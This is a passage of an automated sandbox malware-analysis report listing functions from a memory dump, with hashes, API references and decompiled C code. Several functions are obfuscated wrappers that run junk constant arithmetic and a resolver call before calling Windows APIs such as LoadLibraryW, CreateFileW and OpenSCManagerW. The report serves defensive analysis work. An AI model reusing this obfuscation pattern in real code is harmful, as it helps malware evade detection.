Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID: =V
API String ID: 3298025750-2236090552
Opcode ID: c09ead993ed459e202f4acc41d47a4f65d5bc2936b677d2f25bc197f5a4c51db
Instruction ID: 08d393189db0074743ecdd595ddab4e695626ea0a03a21c0830ad170f0919869
Opcode Fuzzy Hash: c09ead993ed459e202f4acc41d47a4f65d5bc2936b677d2f25bc197f5a4c51db
Instruction Fuzzy Hash: C22144B6C0030DEBCF54CFA4CD46A9EBFB0BB04340F208198E921A6260D3B59B518F80

Uniqueness

Uniqueness Score: -1.00%

Function 02F17C11, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44
libraryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E02F17C11(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t37;
				struct HINSTANCE__* _t44;
				WCHAR* _t47;

				_push(_a8);
				_t47 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02F18002(_t37);
				_v16 = 0xc57804;
				_v16 = _v16 + 0x7e2a;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x062dce69;
				_v20 = 0xc0d373;
				_v20 = _v20 ^ 0xd8d0ddee;
				_v20 = _v20 ^ 0xd81819b4;
				_v12 = 0x9f362e;
				_v12 = _v12 + 0xfffffd91;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000a9d69;
				_v8 = 0xe543a4;
				_v8 = _v8 ^ 0xe0ed073d;
				_v8 = _v8 | 0x93b71955;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0xdfad752a;
				E02F2E399(__ecx, __edx, __ecx, 0xa2449830, 0x129, 0xf0e92e19);
				_t44 = LoadLibraryW(_t47); // executed
				return _t44;
			}

0x02f17c18
0x02f17c1b
0x02f17c1d
0x02f17c20
0x02f17c21
0x02f17c22
0x02f17c27
0x02f17c31
0x02f17c38
0x02f17c3c
0x02f17c43
0x02f17c4a
0x02f17c51
0x02f17c58
0x02f17c5f
0x02f17c66
0x02f17c6a
0x02f17c6e
0x02f17c75
0x02f17c7c
0x02f17c83
0x02f17c8a
0x02f17c8e
0x02f17cb1
0x02f17cba
0x02f17cc0

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 02F17CBA

Strings

*~, xrefs: 02F17C31

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad
String ID: *~
API String ID: 1029625771-2567930604
Opcode ID: b9f3b87bebec21f6148c33e759f0ff5f4f2fe9304ffae80c2c21f0ab5745ad8c
Instruction ID: 78a817fec5a915f17a353d988fa297208a2992c47b2fbfb8ce858d182ca713d7
Opcode Fuzzy Hash: b9f3b87bebec21f6148c33e759f0ff5f4f2fe9304ffae80c2c21f0ab5745ad8c
Instruction Fuzzy Hash: 2B11F2B5D0121CBBDF14EFE5D90A49EBBB4FB00344F108598E826A2250E3B95B59DF80

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2C304, Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2C0A9: GetOEMCP.KERNEL32(00000000,6EA2C31F,?,00000000,6EA2D694,6EA2D694,00000000,00000000,?), ref: 6EA2C0D4

_free.LIBCMT ref: 6EA2C37C
_free.LIBCMT ref: 6EA2C3B2

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 18785bccead17c4a7110ce4aba2f4d89df5fff807ed0719b90913183a8946770
Instruction ID: 1a191bf9a72c541ff7a43d195324eadf55798eb91909e8f586f8aa36a376c452
Opcode Fuzzy Hash: 18785bccead17c4a7110ce4aba2f4d89df5fff807ed0719b90913183a8946770
Instruction Fuzzy Hash: 5D3193719042499FDB00DFE8C840ADEB7B4EF45314F194976E914AB291E731DD94CB58

Uniqueness

Uniqueness Score: -1.00%

Function 6EA14941, Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6EA1498E

Part of subcall function 6EA1508F: InitializeSListHead.KERNEL32(6EA4D898,6EA14998,6EA49DB8,00000010,6EA14929,?,?,?,6EA14B51,?,00000001,?,?,00000001,?,6EA49E00), ref: 6EA15094

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EA149F8

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: e9a60d13effbb71d00e1acdda94b279f57e785962d38e3ab161b128f43842bd3
Instruction ID: a6b66f1e7c0895ee4c89fa6b7f0452327291c963bb3cf17b5b1e2c84ee70335b
Opcode Fuzzy Hash: e9a60d13effbb71d00e1acdda94b279f57e785962d38e3ab161b128f43842bd3
Instruction Fuzzy Hash: 8521D53164C7219EDF10ABFC96147DC37A9AF0636DF294819D451BB1C1DB6244C3C69E

Uniqueness

Uniqueness Score: -1.00%

Function 02F20207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E02F20207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t54;
				int _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				WCHAR* _t81;

				_push(_a16);
				_t81 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02F18002(_t54);
				_v36 = 0xa7e4f2;
				asm("stosd");
				_t70 = 0x7b;
				asm("stosd");
				asm("stosd");
				_v12 = 0x53fdc4;
				_t71 = 0x5a;
				_v12 = _v12 / _t70;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xe1fe8b09;
				_v12 = _v12 ^ 0xe1ac8480;
				_v20 = 0x744728;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x239bcee7;
				_v16 = 0xd5199;
				_v16 = _v16 + 0xffff5a50;
				_v16 = _v16 / _t71;
				_v16 = _v16 ^ 0x000f59f5;
				_v8 = 0xa57c1a;
				_v8 = _v8 | 0x119c25df;
				_v8 = _v8 + 0xffffdcc6;
				_t72 = 0x4f;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x003b1570;
				E02F2E399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
				_t68 = lstrcmpiW(_a8, _t81); // executed
				return _t68;
			}

0x02f2020f
0x02f20212
0x02f20214
0x02f20217
0x02f2021a
0x02f2021d
0x02f2021f
0x02f20224
0x02f20232
0x02f20235
0x02f20238
0x02f20239
0x02f2023a
0x02f20246
0x02f20247
0x02f2024c
0x02f20250
0x02f20257
0x02f2025e
0x02f20265
0x02f20269
0x02f20270
0x02f20277
0x02f20285
0x02f2028a
0x02f20291
0x02f20298
0x02f2029f
0x02f202a9
0x02f202af
0x02f202b2
0x02f202d5
0x02f202e1
0x02f202e8

APIs

lstrcmpiW.KERNEL32(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 02F202E1

Strings

(Gt, xrefs: 02F2025E

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: (Gt
API String ID: 1586166983-558867117
Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction ID: 146af409eb00c0132a1869370c1fdf9b8142b6a2cd4bd1ac4987a15962a7b7f5
Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
Instruction Fuzzy Hash: 912178B5E00208FBEF04DFA4CD0A9DEBBB2FB44714F10C199E515AA250D7B65A10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6EA16D17, Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(?,?,6EA15637,6EA1567D), ref: 6EA16D2A
IsProcessorFeaturePresent.KERNEL32(00000017,6EA28A38,?,6EA2D694,00000000,00000000,?,02E26558,00000000), ref: 6EA27AF5

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodeFeaturePointerPresentProcessor
String ID:
API String ID: 4030241255-0
Opcode ID: bedb885b3935cf6c0c6195099edf250a2e51cf3677f2b661f1786ced80ff8f35
Instruction ID: ecdf1e93da03a4a31d80b41a51705a6e1ed2a2ebc090c904008e6fe81e8b100f
Opcode Fuzzy Hash: bedb885b3935cf6c0c6195099edf250a2e51cf3677f2b661f1786ced80ff8f35
Instruction Fuzzy Hash: 0CF0BB70248706DEFF156BE09D19B653658AB42758F094434B60D7E0D1DF638582CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA253B5, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2C8EF: GetEnvironmentStringsW.KERNEL32 ref: 6EA2C8F8
Part of subcall function 6EA2C8EF: _free.LIBCMT ref: 6EA2C957
Part of subcall function 6EA2C8EF: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EA2C966

_free.LIBCMT ref: 6EA253F5
_free.LIBCMT ref: 6EA253FC

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 816e4e0efc148e0b3b283918471fba5c9777a90ae18a4ce032e72124f8b76584
Instruction ID: 7646c03abee9bb64d215276a99353d41e2bd596a79ed093381c4750dcb4dc128
Opcode Fuzzy Hash: 816e4e0efc148e0b3b283918471fba5c9777a90ae18a4ce032e72124f8b76584
Instruction Fuzzy Hash: 84E0EC22D49D104D935236EE6C1069916597F82338B1D8A36E530FA0C9DBD4C4C2495F

Uniqueness

Uniqueness Score: -1.00%

Function 02F22D06, Relevance: 1.6, APIs: 1, Instructions: 74
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E02F22D06(long __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, long _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, long _a40, long _a44) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t53;
				void* _t66;
				signed int _t68;
				signed int _t69;
				long _t76;

				_push(_a44);
				_t76 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E02F18002(_t53);
				_v32 = 0xa61226;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x8b5566;
				_t68 = 0x4f;
				_v12 = _v12 * 0x16;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x1db24b6c;
				_v20 = 0xae8f68;
				_t69 = 0x28;
				_v20 = _v20 / _t68;
				_v20 = _v20 ^ 0x00028d2f;
				_v16 = 0xdc96c3;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x001086c5;
				_v8 = 0xcc437a;
				_v8 = _v8 << 5;
				_v8 = _v8 / _t69;
				_v8 = _v8 ^ 0x00a46bd6;
				E02F2E399(_t69, _v8 % _t69, _t69, 0xa2449830, 0x1b2, 0xa236d704);
				_t66 = CreateFileW(_a8, _t76, _a44, 0, _a16, _a40, 0); // executed
				return _t66;
			}

0x02f22d0e
0x02f22d13
0x02f22d15
0x02f22d18
0x02f22d1b
0x02f22d1c
0x02f22d1f
0x02f22d22
0x02f22d25
0x02f22d28
0x02f22d29
0x02f22d2c
0x02f22d30
0x02f22d31
0x02f22d36
0x02f22d3f
0x02f22d42
0x02f22d45
0x02f22d52
0x02f22d55
0x02f22d5c
0x02f22d5f
0x02f22d66
0x02f22d72
0x02f22d73
0x02f22d78
0x02f22d82
0x02f22d89
0x02f22d8d
0x02f22d94
0x02f22d9b
0x02f22da9
0x02f22dac
0x02f22dca
0x02f22de1
0x02f22de8

APIs

CreateFileW.KERNEL32(001086C5,?,?,00000000,0007BFC3,?,00000000), ref: 02F22DE1

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 37d28f26a62827ccb09b71f088429a632209e16a918a5702217c5103877af2d7
Instruction ID: 0d2aee2079f7d76d6025a60416c17956588680647f282b841309eb824d9a8f99
Opcode Fuzzy Hash: 37d28f26a62827ccb09b71f088429a632209e16a918a5702217c5103877af2d7
Instruction Fuzzy Hash: 2821007290020CBBDF05DFA5CD498DEBFB6FB89704F108049F914AA260D7B69A14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02F33231, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E02F33231(intOrPtr _a4, int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t51;
				void* _t65;
				signed int _t66;
				signed int _t67;
				signed int _t68;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E02F18002(_t51);
				_v20 = 0x8ddd0f;
				_v20 = _v20 ^ 0xe03e86bb;
				_v20 = _v20 + 0xffff1f0e;
				_v20 = _v20 ^ 0xe0b01721;
				_v16 = 0x43c95a;
				_t66 = 3;
				_v16 = _v16 * 0x6c;
				_t67 = 0x1d;
				_v16 = _v16 / _t66;
				_v16 = _v16 ^ 0x0989b3a6;
				_v12 = 0xb34ce2;
				_v12 = _v12 ^ 0x4f195b2f;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x02b53c02;
				_v8 = 0x60e613;
				_v8 = _v8 + 0xffff76e9;
				_v8 = _v8 + 0xffff1349;
				_t68 = 0x34;
				_v8 = _v8 / _t68;
				_v8 = _v8 ^ 0x000b7b8d;
				E02F2E399(_t68, _v8 % _t68, _t68, 0x1f1ae65e, 0x189, 0x1de1df5f);
				_t65 = OpenSCManagerW(0, 0, _a8); // executed
				return _t65;
			}

0x02f33238
0x02f3323d
0x02f33240
0x02f33243
0x02f33244
0x02f33245
0x02f3324a
0x02f33253
0x02f3325a
0x02f33261
0x02f33268
0x02f33275
0x02f33278
0x02f33280
0x02f33281
0x02f33286
0x02f3328d
0x02f33294
0x02f332a2
0x02f332a7
0x02f332ae
0x02f332b5
0x02f332bc
0x02f332c6
0x02f332cc
0x02f332cf
0x02f332f2
0x02f332ff
0x02f33305

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,0989B3A6,?,?,?,?,?,?,?,9C77B295,?), ref: 02F332FF

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: a68b103b72432212da7b1a25f69248b8733d1da947c96e5792bd945326fca532
Instruction ID: 0f54881f15099f09b6094e68d41a1bda6f774ec57d05ab4d28d07e8fc2d3561b
Opcode Fuzzy Hash: a68b103b72432212da7b1a25f69248b8733d1da947c96e5792bd945326fca532
Instruction Fuzzy Hash: A0213476E01218FBDB04DFA9C94A9DEBFB6FF44310F20C18AE515AA250D7B55B119F80

Uniqueness

Uniqueness Score: -1.00%

Function 02F29038, Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E02F29038(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t53;
				int _t66;
				signed int _t68;
				signed int _t69;
				signed int _t70;

				_push(_a8);
				_push(_a4);
				E02F18002(_t53);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xed3f98;
				_v16 = 0x2a9dca;
				_t68 = 0x79;
				_v16 = _v16 / _t68;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x000f760a;
				_v20 = 0x68a68c;
				_t69 = 0x7f;
				_v20 = _v20 / _t69;
				_v20 = _v20 ^ 0x0005afe9;
				_v8 = 0x320c70;
				_t70 = 0x39;
				_v8 = _v8 / _t70;
				_v8 = _v8 | 0xebb37c35;
				_v8 = _v8 ^ 0x7178f36a;
				_v8 = _v8 ^ 0x9ac8a43f;
				_v12 = 0x21358c;
				_v12 = _v12 << 0xe;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x00063172;
				E02F2E399(_t70, _v8 % _t70, _t70, 0xa2449830, 0x35, 0x3485d61b);
				_t66 = FindCloseChangeNotification(_a4); // executed
				return _t66;
			}

0x02f2903e
0x02f29041
0x02f29046
0x02f2904b
0x02f29051
0x02f29055
0x02f2905c
0x02f29068
0x02f2906d
0x02f29072
0x02f29076
0x02f2907d
0x02f29087
0x02f2908c
0x02f29091
0x02f29098
0x02f290a2
0x02f290a8
0x02f290ab
0x02f290b2
0x02f290b9
0x02f290c0
0x02f290c7
0x02f290cb
0x02f290cf
0x02f290ef
0x02f290fa
0x02f290ff

APIs

FindCloseChangeNotification.KERNEL32(00063172,?,?,?,?,?,?,?,02F309EF), ref: 02F290FA

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 9411e8551fc63ef0553251f4ae46958ba514df95cf067e6227528f3c3549ca8c
Instruction ID: d15adccc512ee36373bb4ca0654feb24b63cc65cb725af576cc19c846a9f7423
Opcode Fuzzy Hash: 9411e8551fc63ef0553251f4ae46958ba514df95cf067e6227528f3c3549ca8c
Instruction Fuzzy Hash: CE2124B1E0020CEBDF04DFE5C94A99EBBB2EB51344F10C199E514AA250D7B95B559F80

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1419F, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6EA0181E

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 8c6ac696b895073ebc8e4a38ebf12487750d912ebe7ef3a1f15ed8de66e97de4
Instruction ID: 6a2f6bd4f957bf91294334e0b952a115b0da5c897b38fa8bb3e4df33efe1fb29
Opcode Fuzzy Hash: 8c6ac696b895073ebc8e4a38ebf12487750d912ebe7ef3a1f15ed8de66e97de4
Instruction Fuzzy Hash: 9A014E7540421D6BDB009BDCDC008C9779C9F1125CB148635F514E7540E730E5C187DC

Uniqueness

Uniqueness Score: -1.00%

Function 02F1F3F7, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02F1F3F7() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t47;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xb0bfd;
				_v32 = 0x231de0;
				_v20 = 0x822c7a;
				_t47 = 0x31;
				_push(_t47);
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x12d3a120;
				_v12 = 0x122796;
				_v12 = _v12 | 0x5fffe7f7;
				_v12 = _v12 ^ 0x5ff36a5b;
				_v8 = 0xc53dc4;
				_v8 = _v8 + 0xffff669e;
				_v8 = _v8 + 0xba03;
				_v8 = _v8 + 0x1f9e;
				_v8 = _v8 ^ 0x00c2122b;
				_v16 = 0x5857ad;
				_v16 = _v16 / _t47;
				_v16 = _v16 ^ 0x000b8ebe;
				E02F2E399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
				ExitProcess(0);
			}

0x02f1f3fd
0x02f1f403
0x02f1f407
0x02f1f40e
0x02f1f415
0x02f1f422
0x02f1f423
0x02f1f429
0x02f1f42c
0x02f1f433
0x02f1f43a
0x02f1f441
0x02f1f448
0x02f1f44f
0x02f1f456
0x02f1f45d
0x02f1f464
0x02f1f46b
0x02f1f479
0x02f1f47c
0x02f1f495
0x02f1f49f

APIs

ExitProcess.KERNEL32(00000000), ref: 02F1F49F

Memory Dump Source

Source File: 00000004.00000002.585390946.0000000002F10000.00000040.00000010.sdmp, Offset: 02F10000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction ID: a53867f4cb2e88a51202184bbacfb9bd806ed114fe8e183890a20e6a10a8c8b2
Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
Instruction Fuzzy Hash: AF11D6B1E1121DEBDF04DFE4D94A6EEBBB4FB14315F108188E521AA250E7B45B558F80

Uniqueness

Uniqueness Score: -1.00%

Function 6EA30435, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2828C: RtlAllocateHeap.NTDLL(00000000,?,?,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?,?), ref: 6EA282BE

_free.LIBCMT ref: 6EA30455

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: fcf8ab6cbe6977095fc231691bc284d822dee87fd2693822f6a1e1ebca8f5209
Instruction ID: fc02144474250ec2d04ff053d3111d1619e691bb84a15c2a025686957af62052
Opcode Fuzzy Hash: fcf8ab6cbe6977095fc231691bc284d822dee87fd2693822f6a1e1ebca8f5209
Instruction Fuzzy Hash: 69F0C2721017008FE7248F85D401B82F7ECEF81B11F20882FE2AA9B590D7B4A8818B98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2828C, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?,?), ref: 6EA282BE

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ce71401d4a8956246354958af68a897a26fde9ba11cba8961f9cfed67670ad17
Instruction ID: 601db5c49c22461d313068bcd3e783c10c37b9e5685e15106d506c2b9276f544
Opcode Fuzzy Hash: ce71401d4a8956246354958af68a897a26fde9ba11cba8961f9cfed67670ad17
Instruction Fuzzy Hash: 5AE03931245E229EEA5116EA8E04B9A7A4D9F523B1B1E0530B936BA180CB64C88183ED

Uniqueness

Uniqueness Score: -1.00%

Function 6EA15B63, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 6EA15B8B

Part of subcall function 6EA15492: std::_Lockit::_Lockit.LIBCPMT ref: 6EA154A4
Part of subcall function 6EA15492: std::locale::_Setgloballocale.LIBCPMT ref: 6EA154BF
Part of subcall function 6EA15492: _Yarn.LIBCPMT ref: 6EA154D5
Part of subcall function 6EA15492: std::_Lockit::~_Lockit.LIBCPMT ref: 6EA15515

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 238635018-0
Opcode ID: 0a994ad8ad67722d8cd34b8c00e897db3559b98471f7cbd145fd262fba5daf8d
Instruction ID: 804ab19b98a7bfc6a182ceb34f47244e7c302b8518905d72269e349fc5f6f567
Opcode Fuzzy Hash: 0a994ad8ad67722d8cd34b8c00e897db3559b98471f7cbd145fd262fba5daf8d
Instruction Fuzzy Hash: 0CE0DFB2A0D6319AD3105BE886113DDA29A6B40B15F748809E400DF6C0DFB04C81838D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EA0E6B0, Relevance: 40.7, APIs: 19, Strings: 4, Instructions: 451stringmemoryCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(6EA0DE78,49283B4B,00000000,00000000), ref: 6EA0E748
CoTaskMemFree.OLE32(00000000,49283B4B,00000000,00000000), ref: 6EA0E774
CharNextW.USER32(?,00000000), ref: 6EA0E7D9
CharNextW.USER32(00000000), ref: 6EA0E7DE
CharNextW.USER32(00000000), ref: 6EA0E7E3
CharNextW.USER32(00000000), ref: 6EA0E7E8
CharNextW.USER32(?), ref: 6EA0E830
CharNextW.USER32 ref: 6EA0E840
CharNextW.USER32(00000000,49283B4B,00000000,00000000), ref: 6EA0E8BA
CharNextW.USER32 ref: 6EA0E8E3
CharNextW.USER32(00000000), ref: 6EA0E917
CoTaskMemFree.OLE32(00000000), ref: 6EA0E92D
lstrcmpiW.KERNEL32(?,?), ref: 6EA0E97C
CharNextW.USER32 ref: 6EA0EA02
CoTaskMemFree.OLE32(00000000), ref: 6EA0EA33
CoTaskMemFree.OLE32(00000000,49283B4B,00000000,00000000), ref: 6EA0EA51
lstrcmpiW.KERNEL32(?,6EA45C7C,?,00000000,C000008C,00000000,00000000), ref: 6EA0EB0D
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6EA0EB2C
CharNextW.USER32(?,?,00000000,00000000,00000000,?), ref: 6EA0EBF1

Strings

HKCU{Software{Classes, xrefs: 6EA0E7F5
}}, xrefs: 6EA0E88C
